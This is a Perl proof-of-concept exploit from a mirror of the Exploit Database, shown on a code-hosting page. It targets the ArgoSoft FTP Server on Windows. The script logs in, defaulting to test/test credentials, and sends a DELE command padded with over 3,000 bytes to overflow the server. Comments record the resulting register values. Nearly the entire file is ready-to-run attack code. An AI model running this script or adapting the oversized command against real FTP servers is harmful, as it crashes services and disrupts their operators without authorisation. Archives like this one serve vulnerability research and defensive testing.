bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/1531.pl
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

51 lines
No EOL
1.3 KiB
Perl
Executable file
Raw Permalink Blame History

#!/usr/bin/perl
# ---------------------------------------------------- #
# ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server #
# Jerome Athias #
# ---------------------------------------------------- #
use Net::FTP;
# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];
# ===========
if (($host) && ($port)) {
# make exploit string
$exploit_string = "DELE ";
$exploit_string .= "A" x 2041;
$exploit_string .= "B" x 4;
$exploit_string .= "C" x 1026;
# On Win2K SP4 FR:
# EAX 42424241
# ECX 43434343
# EDX 43434342
# EBX 43434B73
# ===================
print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug=> $debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Logging...\n";
if (!$user) {
$user = "test";
$pass = "test";
}
$sock->login($user, $pass);
$answer = $sock->message;
print "Sending string...\n";
$sock->quot($exploit_string);
} else {
print "ArgoSoft FTP Server - PoC Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n";
}
# milw0rm.com [2006-02-25]
Reference in a new issue View git blame Copy permalink